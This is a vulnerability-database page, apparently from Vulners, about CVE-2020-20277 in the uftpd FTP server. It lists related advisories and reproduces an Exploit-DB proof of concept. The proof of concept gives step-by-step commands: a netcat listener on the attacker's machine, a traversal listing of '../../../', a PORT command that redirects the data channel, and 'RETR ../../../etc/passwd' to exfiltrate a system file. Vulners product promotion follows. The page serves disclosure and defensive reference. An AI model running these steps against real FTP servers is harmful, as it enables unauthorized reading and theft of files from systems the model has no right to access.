| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| uftpd 2.10 - Directory Traversal (Authenticated) Vulnerability | 2 Aug 202200:00 | ā | zdt | |
| CVE-2020-20277 | 18 Dec 202022:44 | ā | circl | |
| uftpd Path Traversal Vulnerability | 18 Dec 202000:00 | ā | cnnvd | |
| CVE-2020-20277 | 18 Dec 202018:09 | ā | cve | |
| CVE-2020-20277 | 18 Dec 202018:09 | ā | cvelist | |
| uftpd 2.10 - Directory Traversal (Authenticated) | 2 Aug 202200:00 | ā | exploitdb | |
| CVE-2020-20277 | 18 Dec 202019:15 | ā | nvd | |
| Directory traversal | 18 Dec 202019:15 | ā | prion | |
| PT-2020-15252 Ā· Uftpd Ā· Uftpd | 18 Dec 202000:00 | ā | ptsecurity | |
| CVE-2020-20277 | 22 May 202516:06 | ā | redhatcve |
`# Exploit Title: uftpd 2.10 - Directory Traversal (Authenticated)
# Google Dork: N/A
# Exploit Author: Aaron Esau (arinerron)
# Vendor Homepage: https://github.com/troglobit/uftpd
# Software Link: https://github.com/troglobit/uftpd
# Version: 2.7 to 2.10
# Tested on: Linux
# CVE : CVE-2020-20277
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2020-20277
# Reference: https://arinerron.com/blog/posts/6
#Product: uftpd 2.7 to 2.10
#Proof-Of-Concept:
1-Arbitrary files could be read using directory traversal if the application is not running as root after authenticating. If the server has anonymous login enabled, it will be possible to read arbitrary files even without authentication.
#Steps
1-Setup nc listener on attacking machine on TCP port 1258
nc -lnvp 1258
2-Login to the FTP service
3-List files
ftp> ls ../../../
3-Set attacker's IP address and retrieve files
PORT 127,0,0,1,1,1002
RETR ../../../etc/passwd
`
Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation